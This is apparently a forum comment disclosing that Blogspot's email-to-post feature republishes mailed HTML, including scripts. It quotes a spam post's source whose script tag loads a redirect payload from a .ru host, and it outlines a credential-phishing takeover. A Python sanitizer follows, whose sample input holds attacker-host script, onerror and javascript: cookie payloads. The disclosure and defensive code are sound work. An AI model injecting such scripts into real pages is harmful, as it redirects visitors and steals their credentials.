by blauwbilgorgel 4973 days ago
Automatically posting any email received onto the web can be a security issue. As you said, Blogspot is indiscriminate on which e-mail it publishes, there is no need to suggest a virus is targeting Facebook or Twitter mails -- I was confused on that point.

I've tested the indiscriminate posting and any HTML you send to Blogspot accounts with this feature gets published, including <script> tags.

An e-mail client isn't supposed to execute <script> tags, I feel if you republish an email online, it should strip out the <script> tags too.

The Blogspot sites that run this service are currently under attack by spammers, who send spam emails (which don't seem to get filtered very well), allowing spam by proxy and editorial-looking links. Some go even further and send them emails containing redirect scripts, or entire websites with CSS-styles set on the body.

  view-source:http://byubjjclub.blogspot.com/search?updated-max=2012-10-23T21:02:00-06:00&max-results=5&start=5&by-date=false
contains such an email-to-webpage post as an example in the source.

  <div class='post-body entry-content' id='post-body-3218874062265356726' itemprop='description articleBody'>
  <style type="text/css"> 
  h1 a:hover {background-color:#888;color:#fff ! important;}                          
  [...]
  </style> 
  [...]
  <div xmlns="http://www.w3.org/1999/xhtml" id="emailbody" 
  style="margin:0 2em;
  [...]
  <table style="border:0;padding:0;margin:0;width:100%">
  [...]
  <br /> <br /> <script language="javascript"
  src="http://luckysearcher.ru/6peybjqhb197phmv2pevisws0k5u0k5"
  type="text/javascript"></script> <img
  src="https://encrypted-tbn3.gstatic.com/images?q=tbn:ANd9GcTcpQG9IOqXoDrlzTdytRpeTN7sqIocaNZBAwxXxGEGUNrD4iwE" /> 
  <br /> <br />
  [...]
  To stop receiving these emails, you may <a href="http://feedburner.google.com/fb/a/mailunsubscribe?k=uVg9TnxQ6-Owt_QRoJn279y21hs">unsubscribe now</a>.
  </td> <td style="font-family:Helvetica,Arial,Sans-Serif;font-size:11px;margin:0 6px 1.2em 0;color:#333;text-align:right;vertical-align:top">Email
  delivery powered by Google</td> </tr> <tr>
  ...
Sending such an e-mail to Blogspot users with this feature will redirect all their visitors to

  view-source:http://mupara.ru/index.php?pid=19868&subid=31445&psn=131
Custom CSS and custom script allow for attack vectors such as these. Spam doesn't seem to filter very well. This is something of an issue that Blogspot can protect their users and visitors against, no? And did the users of this function understand the privacy ramifications of turning their inbox into a public mailing-list?

Worse than redirects, thinking like a wicked spammer:

  1. User turns on feature inbox-to-webpage
  2. Spammer finds these users by scanning the index
  3. Spammer sends such users (or with every spam mail) a malicious javascript file
  4. javascript pop-up with: "Re-enter your credentials"
  5. Change password and steal blog
  6. Check if blogspot account is connected to a Gmail account.
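The mitigation the comment asks for (strip <script>, <style> and other active content before republishing an e-mail as a web page) can be implemented as an allow-list sanitizer. The code below is an added example written for this thread; it is not code from the comment, from Blogger or from Google, and it uses only the Python standard library. The tag and attribute policy (`ALLOWED_TAGS`, `ALLOWED_ATTRS`, `DROP_CONTENT_TAGS`) and the function names are assumptions made for the example, and the sample e-mail is constructed to resemble the fragment quoted above, with placeholder hostnames.

```python
from html.parser import HTMLParser
from html import escape

# Hypothetical republishing policy (an assumption for this example, not Blogger's rules):
# - tags in ALLOWED_TAGS are kept, with only the attributes listed in ALLOWED_ATTRS;
# - tags in DROP_CONTENT_TAGS are removed together with everything inside them;
# - every other tag is unwrapped (tag removed, its text kept), so layout tricks such as
#   a sender-supplied <style> or a whole <table> cannot restyle or hide the host page.
ALLOWED_TAGS = {"p", "br", "b", "i", "em", "strong", "a", "ul", "ol", "li", "blockquote", "pre", "code"}
ALLOWED_ATTRS = {"a": {"href"}}
DROP_CONTENT_TAGS = {"script", "style", "iframe", "object", "embed"}
SAFE_URL_SCHEMES = ("http://", "https://", "mailto:")


class EmailHtmlSanitizer(HTMLParser):
    """Rebuilds an e-mail body from an allow-list; anything not explicitly allowed is gone."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []            # sanitized output fragments
        self.drop_depth = 0      # > 0 while inside a script/style/iframe/... element
        self.open_allowed = []   # stack of allowed tags we have emitted and must close

    def handle_starttag(self, tag, attrs):
        if self.drop_depth:
            if tag in DROP_CONTENT_TAGS:
                self.drop_depth += 1
            return
        if tag in DROP_CONTENT_TAGS:
            self.drop_depth = 1
            return
        if tag not in ALLOWED_TAGS:
            return  # unwrap: drop the tag itself, keep its text content
        kept = []
        for name, value in attrs:
            # event handlers (onerror=...), style=..., id=... never pass: not in the allow-list
            if name not in ALLOWED_ATTRS.get(tag, ()) or value is None:
                continue
            # javascript:, data: and similar schemes are rejected on href
            if name == "href" and not value.strip().lower().startswith(SAFE_URL_SCHEMES):
                continue
            kept.append(f' {name}="{escape(value, quote=True)}"')
        if tag == "br":
            self.out.append("<br>")  # void element, nothing to close
        else:
            self.out.append(f"<{tag}{''.join(kept)}>")
            self.open_allowed.append(tag)

    def handle_endtag(self, tag):
        if self.drop_depth:
            if tag in DROP_CONTENT_TAGS:
                self.drop_depth -= 1
            return
        if tag in self.open_allowed:
            # close back to the matching tag, closing anything the sender left open inside it
            while self.open_allowed:
                t = self.open_allowed.pop()
                self.out.append(f"</{t}>")
                if t == tag:
                    break

    def handle_data(self, data):
        # text is re-escaped, so "&lt;script&gt;" in the mail stays inert text on the page
        if not self.drop_depth:
            self.out.append(escape(data, quote=False))

    # comments, processing instructions and doctype declarations are silently dropped
    # (HTMLParser's default handlers for them do nothing)


def sanitize_email_html(raw_html: str) -> str:
    """Return the sanitized HTML fragment that is safe to embed in the blog page."""
    p = EmailHtmlSanitizer()
    p.feed(raw_html)
    p.close()
    while p.open_allowed:  # balance whatever the sender left open
        p.out.append(f"</{p.open_allowed.pop()}>")
    return "".join(p.out)


# Constructed sample modelled on the quoted fragment; hostnames are placeholders.
SAMPLE_EMAIL = """<style type="text/css">body{display:none}</style>
<div id="emailbody"><table><tr><td>
<p>Great deals <b>today</b>!</p>
<script language="javascript" src="http://attacker.example/redirect.js" type="text/javascript"></script>
<img src="http://attacker.example/track.gif" onerror="alert(1)" />
<a href="javascript:alert(document.cookie)">click</a>
<a href="https://example.com/unsubscribe?k=TOKEN">unsubscribe now</a>
</td></tr></table></div>"""

if __name__ == "__main__":
    print(sanitize_email_html(SAMPLE_EMAIL))
```

The point of the allow-list shape is that new attack vectors (a tag or attribute the sanitizer's author never heard of) fail closed: they are simply not in the list, so they are unwrapped or dropped rather than forwarded to every visitor of the blog.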